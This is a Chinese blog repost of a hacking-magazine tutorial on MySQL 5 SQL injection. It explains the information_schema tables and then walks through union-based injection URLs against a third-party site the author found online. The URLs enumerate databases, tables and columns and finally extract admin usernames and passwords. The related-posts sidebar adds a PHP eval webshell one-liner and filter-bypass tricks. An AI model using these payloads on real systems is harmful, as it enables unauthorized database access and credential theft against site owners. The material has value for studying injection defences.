Mysql5注射技巧总结

最新推荐文章于 2021-11-03 16:41:52 发布
最新推荐文章于 2021-11-03 16:41:52 发布
阅读量635 收藏
点赞数
文章标签: mysql schema 数据库 table constraints character
flyh4t@126.com

文章已经发表在《黑客手册》,转载请署名版权

Mysql5和之前的版本有很多不同的地方,灵活的运用其特性可以在入侵的时候省掉很多麻烦。我试图在本文把在《渗透周杰伦官方网站》中没有写清楚的部分表达出来,你看明白这个文章后也许你会发现,原来mysql5也可以像mssql一样注射。

一、原理分析

我们先看看mysql5比之前增加的系统数据库information_schema的结构,它是用来存储数据库系统信息的

mysql> use information_schema;

Database changed

mysql> show tables;

+---------------------------------------+

| Tables_in_information_schema |

+---------------------------------------+

| CHARACTER_SETS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUMNS |

| COLUMN_PRIVILEGES |

| KEY_COLUMN_USAGE |

| ROUTINES |

| SCHEMATA |

| SCHEMA_PRIVILEGES |

| STATISTICS |

| TABLES |

| TABLE_CONSTRAINTS |

| TABLE_PRIVILEGES |

| TRIGGERS |

| USER_PRIVILEGES |

| VIEWS |

+---------------------------------------+

如果读者有兴趣可以自己装一个mysql5研究一下这几个表存储的信息,我这里只挑注射中可以用到的几个表。 

| SCHEMATA ――>存储数据库名的,

|——>关键字段:SCHEMA_NAME,表示数据库名称

| TABLES ――>存储表名的

|——>关键字段:TABLE_SCHEMA表示表所属的数据库名称;

TABLE_NAME表示表的名称

| COLUMNS ――>存储字段名的

|——>关键字段:TABLE_SCHEMA表示表所属的数据库名称;

TABLE_NAME表示所属的表的名称

          COLUMN_NAME表示字段名

可以看到,我们只要通过注射点构造查询语句遍相关字段,就可以得到我们想要的信息了。

二、实战测试

到网上找到一个注射点,首先还是像以往一样猜字段、版本和数据库用户,如图1

xx.com/news_info.php?wid=-1/**/union/**/select/**/1,user(),3,4,version(),6,7,8,9,10,11,12,13,14,15/*
http://pic.yupoo.com/sunlei/075904f6f3fc/zwvmqtll.jpg
图一

下面猜数据库,可以通过不断递增limit的第一个参数查询到所有的数据库名,如图2

xx.com/news_info.php?wid=-1/**/union/**/select/**/1,SCHEMA_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15 from/**/information_schema.SCHEMATA limit 17,1/*
http://pic.yupoo.com/sunlei/504954f6f3fe/32u8def7.jpg
图2

遍里webbase里面的表名,找到敏感的表,如图三(0x77656262617365是webbase的十六进制编码)

xx.com/news_info.php?wid=-1/**/union/**/select/**/1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=0x77656262617365/**/limit/**/11,1
http://pic.yupoo.com/sunlei/644934f6f401/65ufe5ux.jpg
图3

tg_adminuser十六进制编码为0x74675F61646D696E75736572,依次查找该表里面的字段名,如图4,图5

xx.com/news_info.php?wid=-1/**/union/**/select/**/1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=0x74675F61646D696E75736572/**/limit/**/1,1
http://pic.yupoo.com/sunlei/062564f6f403/qrbco68j.jpg
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=0x74675F61646D696E75736572/**/limit/**/2,1
http://pic.yupoo.com/sunlei/342874f6f403/y56ibcwf.jpg
图五

数据库,表名,字段我们都知道了,查出密码就很简单了,如图六

xx.com/news_info.php?wid=-1/**/union/**/select/**/1,username,3,4,password,6,7,8,9,10,11,12,13,14,15/**/from/**/webbase.tg_adminuse
http://pic.yupoo.com/sunlei/090024f6f406/hcxzd76b.jpg
图6

文章就到这里结束了,懂点sql语法的朋友应该看的比较明白了:)  
cnbird2008
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL注入绕开过滤的技巧总结
12-16
首先来看GIF操作: 情况一:空格被过滤 使用括号()代替空格,任何可以计算出结果的语句,都可以用括号包围起来; select * from(users)where id=1; 使用注释/**/绕过空格;...select * from/**/users/**/where id=1;...
对Group_concaT函数利用剖析 (转)
weixin_30484739的博客
08-01 97
作者:晓华 开篇介绍 在FLYH4T大哥的“Mysql5注射技巧总结”一文中介绍了通过使用“information_schema”库实现遍历猜解库名表名以及字段名的技术,解决了一些以前使用工具...
mysql 注入补丁_MySQL注入总结
weixin_42241165的博客
12-24 225
SELECTfirst_name,last_nameFROMusersWHEREuser_id='$id'1、id=1' or 1=1 -- 这个可以查询所有的信息,其中“-- ”表示注释,它后面的内容将成为注释内容,注意:--后面要留有空格注释符还有:# 和 /*目录:0x00 mysql一般注入(select)0x01 mysql一般注入(insert、update)0...
SQL注入:爆破库、表、字段
qi_SJQ_的博客
11-03 3888
1.MySQL注入:
使用 Navicat 导出数据表的表结构到 excel
阿鹏的博客
09-09 8837
使用 Navicat 工具导出数据表的表结构到 excel 目录 使用 Navicat 工具导出数据表的表结构到 excel 前言 一、方式一 (推荐) 1.使用SQL查询出表结构 总结 前言 在设计数据表的时候,一般都要产出数据库设计文档,这时候对着数据表一个一个打,是很恶心自己的事。那么有没有方便的方式可以一键导出已存在的数据表的表结构呢?当然是有的 一、方式一 (推荐) 1.使用SQL查询表结构 可以在Navicat中新建一个查询,执行如下语句 SQL 如下(示例)...
mysql 爆库_Mysql 通过information_schema爆库,爆表,爆字段
weixin_31188927的博客
01-19 337
MySQL版本大于5.0时,有个默认数据库information_schema,里面存放着所有数据库的信息(比如表名、 列名、对应权限等),通过这个数据库,我们就可以跨库查询,爆表爆列。若要从这些视图中检索信息,请指定完全合格的 INFORMATION_SCHEMAview_name 名称。列名数据类型描述TABLE_CATALOGnvarchar(128)表限定符。TABLE_SCHEMAnva...
MySQL数据库常用操作技巧总结
09-09
主要介绍了MySQL数据库常用操作技巧,结合实例形式总结分析了mysql查询、存储过程、字符串截取、时间、排序等常用操作技巧,需要的朋友可以参考下
Mysql5注射工具
04-18
Mysql5注射工具 玩注射的朋友们下载看看吧,会用到的。
MySQL查询优化的5个实用技巧
12-16
本文总结分析了MySQL查询优化的技巧。分享给大家供大家参考,具体如下: 熟悉SQL语句的人都清楚,如果要对一个任务进行操作的话,SQL语句可以有很多种相关写法,但是不同的写法查询的性能可能会有天壤之别。 本文...
PyQt5 + MySQL简单示例
04-28
PyQt5 + MySQL简单示例
mysql爆表_Mysql 通过 information_schema 爆库,爆表,爆字段
weixin_42168230的博客
01-28 180
MySQL 版本大于 5.0 时,有个默认数据库 information_schema,里面存放着所有数据库的信息 (比如表名、 列名、对应权限等),通过这个数据库,我们就可以跨库查询,爆表爆列。若要从这些视图中检索信息,请指定完全合格的 INFORMATION_SCHEMAview_name名称。列名数据类型描述TABLE_CATALOGnvarchar(128)表限定符。TABLE_SCHEM...
mysql 注入检测服务_检测周杰伦官方网站 mysql5注入
weixin_35976688的博客
01-20 108
文章作者:Flyh4t[脚本安全小组]信息来源:邪恶八进制信息安全团队(www.eviloctal.com)本文已经发表在《***手册》,转载请署名版权某日在群里聊天,有朋友丢出一个jay官方网站的注入点,闲着无聊就测试了下。没想到最后轻松的得到了系统权限。在取得webshell过程中遇到点困难,也学到了一点东西。看注射点,老规矩,先提交个单引号,返回如图1错误提示是You have an err...
Dedecms getip()的漏洞利用
weixin_34248849的博客
03-31 125
flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell: 在用户登陆后把用户信息写如了缓存:\include\inc_memberlogin.phpfunction FushCache($mid=0){if(empty(...
jieqi(杰奇)cms v1.6 php代码执行0day漏洞,Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP
weixin_39935092的博客
04-06 241
print_r('+---------------------------------------------------------------------------+Jieqi CMS V1.6 PHP Code Injection Exploitby flyh4tmail: phpsec at hotmail dot comteam: http://www.wolvez.org+-----...
php base64_decode的一个知识点
weixin_33743703的博客
12-17 117
从 Flyh4t 的某篇老文上知道的: 在字符串不包括 + \ =等特殊符号的情况下,base64_decode的参数是无须使用单引号或者双引号的 base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4x); <?php @eval($_POST[a]); ?>1 转载于:https://blo...
检测周杰伦官方网站 (鬼仔 )
jahn的专栏
10-02 637
文章作者:Flyh4t[脚本安全小组]信息来源:邪恶八进制信息安全团队(www.eviloctal.com)本文已经发表在《黑客手册》,转载请署名版权某日在群里聊天,有朋友丢出一个jay官方网站的注入点,闲着无聊就测试了下。没想到最后轻松的得到了系统权限。在取得webshell过程中遇到点困难,也学到了一点东西。看注射点,老规矩,先提交个单引号,返回如图1错误提示是You have an er
织梦dedecms5.5爆最新漏洞,可得到webshell
weixin_33788244的博客
12-03 548
影响版本:Dedecms 5.5漏洞描述:漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。<*参考 by:Flyh4t*...
马克斯cms转php,马克斯CMS2.0beta (maxcms)管理员认证绕过漏洞
weixin_42511517的博客
03-26 471
<?phpprint_r('+---------------------------------------------------------------------------+maxcms2.0 creat new admin exploitby Flyh4tteam:wolvez security teamsite:bbs.wolvez.orgdork:salemax#qq.com+...
小步快跑,快速迭代:安全运营的器术法道
Tencent_SRC的博客
08-12 7080
作者 | 腾讯安全平台部 lake2在进行安全体系建设工作的时候,人们往往容易看到的成果是新研发了一个安全系统,采用了一个新的技术,似乎做出一个系统采用一种技术就可以一劳永逸地解决某类问...
mysql 一些高级技巧
最新发布
09-06
当谈到MySQL的高级技巧时,有很多方面可以探索。这里提供一些常见的高级技巧,希望对你有所帮助: 1. 索引优化:合理地创建和使用索引可以大幅提升查询性能。了解查询执行计划以及使用EXPLAIN命令进行优化是非常...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值